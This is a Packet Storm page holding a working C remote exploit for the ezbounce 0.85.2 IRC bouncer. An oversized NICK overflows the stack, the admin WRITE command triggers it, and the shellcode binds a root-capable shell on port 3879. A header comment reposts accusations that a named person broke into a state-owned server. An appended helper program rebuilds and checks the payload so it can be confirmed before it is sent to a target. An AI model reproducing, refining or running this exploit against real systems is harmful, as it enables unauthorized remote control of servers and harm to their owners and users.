ezbounce.c

Posted Sep 29, 2000
Authored by Sectorx

Remote stack overflow exploit for ezbounce 0.85.2 (and probably other versions), carrying the return address for the RedHat 6.0 RPM build. It needs the bouncer's connect password plus an admin username and password: the oversized NICK is sent first, and the overflow is triggered with the admin WRITE command. The shellcode binds a shell on TCP port 3879.

tags | exploit, remote, overflow
systems | linux, redhat
SHA-256 | 5308ae9853de5798deb77486bbb195cef485649413d9843a76a889824464594f

/* ezbounce version (0.85.2 and probably others) exploit by sectorx
* mad thanks to duke for helping me with the segment probe code :)
 * I included the offset of RedHat 6.0's RPM; feel free to report any
 * other offsets of precompiled binaries to me.
*
* PRIVATE! DO NOT DISTRIBUTE!!
*
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* This source code was supposed to be PRIVATE PROPERTY of XOR,
* though it was set public, WITHOUT OUR PERMISSION, by gov-boi,
* the owner of hack.co.za. This once again proves Phonic's claims
* about gov-boi.
*
*
 * "The Source Code Thief Revealed" --Phonic :
* ------------------------------------------
*
* Welcome to the new www.hack.co.za
*
* My name is phonic. you might have heard of me.
*
* Part I
* ----------
* You might have noticed that recently a file was added called the Cisco
* Auditing Tool. This tool was a pretty nice all-in-one Cisco Router tool
* coded by g0ne. I was helping him work on this tool, and I happened to
* have a local copy of it on the machine I admin: Station 25. I might also
* add that this is a state owned box. Well, as we were working on this tool,
* we were getting it ready for release. Working out a few bugs, adding some
* new tools, etc. So I had the latest version of the source in a private
 * directory on my box. Also, I had a large collection of unreleased source
 * code.
*
* Part II
* ----------
* About a month or so ago, I was asked by a friend, whose name will remain
* confidential, if I would mind hosting www.hack.co.za for gov-boi, aka
* rage. Apparently, the previous hoster stopped hosting it for reasons
* unknown to me, so the site was down for a while. I, being the kind and
* generous person that I am so well known to be =], said ok. So for the past
 * month or so, www.hack.co.za was being hosted here. I helped gov-boi set up
 * the dns tables, etc. so that the site would work and everyone would be
* happy.
*
* Part III
* ----------
* Like I said earlier, the pre-release source code for the Cisco Auditing
* Tool was on this box. On the night of May 25th 2000, I get a phone call
* from g0ne. Apparently, someone had posted the source code to packet storm.
* Well, this was strange because only 3 people, myself and g0ne included,
* had the source. I didn't think anyone on my box would have taken it since
* I thought they were all trustworthy. It turned out I was sadly mistaken.
* After careful examination of the box, I learned that gov-boi rooted the
* box, the box I was generous enough to let him use, with a local exploit.
* Not hiding his work at all, this was easily found out in the logs.
*
* Part IV
* ----------
* gov-boi decided that in exchange for the generosity that I extended
* towards him, with nothing asked for in return, he was going to go behind
* my back, and steal tons of source code for his web site. I imagine he is
* going to quickly change the dns tables to unlink this server from
* www.hack.co.za once he realizes that I found out that he is a source code
* thief. Now, in my humble opinion, and I could be wrong, I think this is
* really fucked up.
*
* Part V
* ----------
 * Finally, tomorrow I have to file a report about the intrusion and hack on
 * this system by gov-boi.
* Oh, did I mention that this is a state owned box?
*
* Thank you for your time.
* -phonic
*
* --snip snip--
*
* Thanks for your time.
* --sectorx <sectorx@themarines.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>

#define MAX 4096
#define TIMEOUT 1       /* seconds to wait for the server to go quiet */
#define SIZE 400        /* total length of the NICK payload */
#define TOP 310         /* shellcode ends just before this offset; ADDR copies follow */
#define ADDR 0xbffff26c /* ezbounce 0.85.2 RedHat 6.0 RPM offset */

/* bind a shell on port 3879 by lamagra */
char shellcode[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

/* TCP connect to ip (network byte order, as inet_addr() returns it) on port. */
int Connect(in_addr_t ip, int port)
{
    int fd;
    struct sockaddr_in a;

    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (fd < 0) return -1;
    memset(&a, 0, sizeof(a));
    a.sin_family = AF_INET;
    a.sin_port = htons(port);
    a.sin_addr.s_addr = ip;
    if (connect(fd, (struct sockaddr *)&a, sizeof(a)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* printf-style send; echoes each line to stdout prefixed with "-> ". */
int sprint(int fd, const char *str, ...)
{
    va_list args;
    char buf[MAX];

    va_start(args, str);
    vsnprintf(buf, MAX, str, args);
    va_end(args);
    printf("-> %s", buf);
    return write(fd, buf, strlen(buf));
}

/* Return 1 if fd becomes readable within sec seconds, 0 otherwise. */
int Datawatch(int fd, int sec)
{
    fd_set fds;
    struct timeval tv;

    tv.tv_sec = sec;
    tv.tv_usec = 0;
    FD_ZERO(&fds);
    FD_SET(fd, &fds);
    if (select(fd + 1, &fds, NULL, NULL, &tv) > 0) return 1;
    return 0;
}

/* Drain the server's output until it is quiet for TIMEOUT seconds;
 * return how many reads contained the string grep. */
int Get(int fd, char *grep)
{
    char buf[MAX];
    int ret = 0;
    ssize_t n;

    while (Datawatch(fd, TIMEOUT) > 0) {
        memset(buf, 0, sizeof(buf));
        n = read(fd, buf, sizeof(buf) - 1);  /* keep the buffer NUL-terminated */
        if (n <= 0) break;                   /* EOF or error: the peer is gone */
        if (strstr(buf, grep)) ++ret;
    }
    return ret;
}

int main(int argc, char *argv[])
{
    int i, fd;
    char buf[SIZE];

    printf("ezbounce remote exploit by sectorx of xor\n");
    if (argc < 6) {
        printf("Usage: %s <ip> <port> <password> <admin username> <admin password>\n\n", argv[0]);
        return 1;
    }

    /* Payload layout (SIZE bytes, sent as the nickname):
     *   NOP sled (0x90) up to the shellcode
     *   shellcode, ending at TOP-3; its terminating NUL at TOP-2 is patched back to a NOP
     *   ADDR repeated from TOP+2 to SIZE-5, so one copy lands on the saved return address
     *   NUL at SIZE-1 so the buffer is a C string
     * The *(long *) store assumes a 32-bit little-endian host, like the x86 target. */
    memset(buf, 0x90, sizeof(buf));
    for (i = TOP + 2; i < SIZE - 4; i += 4) *(long *)&buf[i] = ADDR;
    memcpy(buf + (TOP - sizeof(shellcode) - 1), shellcode, sizeof(shellcode));
    buf[TOP - 2] = 0x90;
    buf[SIZE - 1] = '\0';

    fd = Connect(inet_addr(argv[1]), atoi(argv[2]));
    if (fd < 0) {
        perror("Connect ");
        return 1;
    }
    /* Register with the bouncer using the oversized NICK, authenticate,
     * then become admin; the WRITE command is what fires the overflow. */
    sprint(fd, "USER xor\n");
    sprint(fd, "NICK %s\n", buf);
    sprint(fd, "PASS %s\n", argv[3]);
    Get(fd, "NOTICE");
    sprint(fd, "ADMIN %s %s\n", argv[4], argv[5]);
    if (Get(fd, "granted") == 0) {
        printf("** Error: i was unable to gain administrative privileges using provided l/p\naborting.\n");
        close(fd);
        return 1;
    }
    sprint(fd, "WRITE all a\n");
    printf("Code sent! telnet to port 3879 for shell\n");
    close(fd);
    return 0;
}
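Before pointing a payload like the one above at a host it is worth checking what actually goes on the wire. The following is an added example, not part of sectorx's exploit or of ezbounce: it rebuilds the NICK buffer with the exploit's own constants (SIZE, TOP, ADDR and lamagra's shellcode) and reports the NOP sled length, the offset the shellcode lands at, how many copies of ADDR follow it, the length sprint() really sends (an unexpected NUL would cut it short), whether any CR, LF or space would end the NICK parameter early on an IRC-style line, and the bind port decoded from the shellcode's `mov word [ebp-0x12], imm16`, which should come out as 3879 and so confirm the "port 3879" comment. `struct layout`, `build_payload`, `analyze` and `check_payload` are names introduced here.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SIZE 400
#define TOP  310
#define ADDR 0xbffff26cUL   /* same RedHat 6.0 RPM offset as the exploit */

/* lamagra's bind-shell shellcode, byte for byte as in the exploit above */
static const unsigned char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

/* What the check reports about one payload (names introduced here). */
struct layout {
    size_t sled;        /* 0x90 bytes before the first shellcode byte */
    size_t sc_off;      /* offset of the shellcode within the payload */
    size_t ret_copies;  /* 4-byte little-endian copies of ADDR in the payload */
    size_t wire_len;    /* strlen(): the bytes sprint() really puts after "NICK " */
    int    bad_bytes;   /* CR, LF or space among the sent bytes */
    unsigned bind_port; /* port decoded from the shellcode's mov word [ebp-0x12], imm16 */
};

/* Rebuild the NICK buffer as the exploit's main() does, but write ADDR byte by
 * byte instead of through *(long *) so the layout is the same on a 64-bit host. */
void build_payload(unsigned char buf[SIZE])
{
    size_t i;

    memset(buf, 0x90, SIZE);
    for (i = TOP + 2; i < SIZE - 4; i += 4) {
        buf[i]     =  ADDR        & 0xff;
        buf[i + 1] = (ADDR >> 8)  & 0xff;
        buf[i + 2] = (ADDR >> 16) & 0xff;
        buf[i + 3] = (ADDR >> 24) & 0xff;
    }
    memcpy(buf + (TOP - sizeof(shellcode) - 1), shellcode, sizeof(shellcode));
    buf[TOP - 2] = 0x90;     /* turn the shellcode's terminating NUL back into a NOP */
    buf[SIZE - 1] = '\0';
}

struct layout analyze(const unsigned char *buf)
{
    const unsigned char ret[4] = { ADDR & 0xff, (ADDR >> 8) & 0xff,
                                   (ADDR >> 16) & 0xff, (ADDR >> 24) & 0xff };
    const unsigned char movport[4] = { 0x66, 0xc7, 0x45, 0xee }; /* mov word [ebp-0x12], imm16 */
    struct layout l;
    size_t i;

    memset(&l, 0, sizeof(l));
    l.wire_len = strlen((const char *)buf);           /* a stray NUL shows up as a short length */
    while (l.sled < l.wire_len && buf[l.sled] == 0x90) l.sled++;
    l.sc_off = l.sled;
    for (i = 0; i + 4 <= l.wire_len; i++) {
        if (memcmp(buf + i, ret, 4) == 0) l.ret_copies++;
        /* the imm16 sits in memory as two bytes, which sockaddr_in reads in network order */
        if (memcmp(buf + i, movport, 4) == 0 && i + 6 <= l.wire_len)
            l.bind_port = (unsigned)buf[i + 4] << 8 | buf[i + 5];
    }
    for (i = 0; i < l.wire_len; i++)
        if (buf[i] == '\r' || buf[i] == '\n' || buf[i] == ' ') l.bad_bytes++;
    return l;
}

/* Build and check in one call so a caller can look at the result directly. */
struct layout check_payload(void)
{
    unsigned char buf[SIZE];

    build_payload(buf);
    return analyze(buf);
}

int main(void)
{
    struct layout l = check_payload();

    printf("NOP sled %zu bytes, shellcode at offset %zu (%zu bytes)\n",
           l.sled, l.sc_off, sizeof(shellcode) - 1);
    printf("%zu copies of 0x%08lx after it, %zu bytes go on the wire\n",
           l.ret_copies, ADDR, l.wire_len);
    printf("CR/LF/space bytes: %d, shellcode binds port %u\n", l.bad_bytes, l.bind_port);
    return 0;
}
```

With the constants above the sled is 179 bytes, the 129-byte shellcode sits at offset 179, 21 copies of ADDR follow it, all 399 bytes survive strlen(), no CR, LF or space appears, and the decoded port is 3879. Because ADDR is written one byte at a time this gives the same answer on a 64-bit host, unlike the exploit's own `*(long *)` store, which writes 8 bytes there.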
© 2022 Packet Storm. All rights reserved.
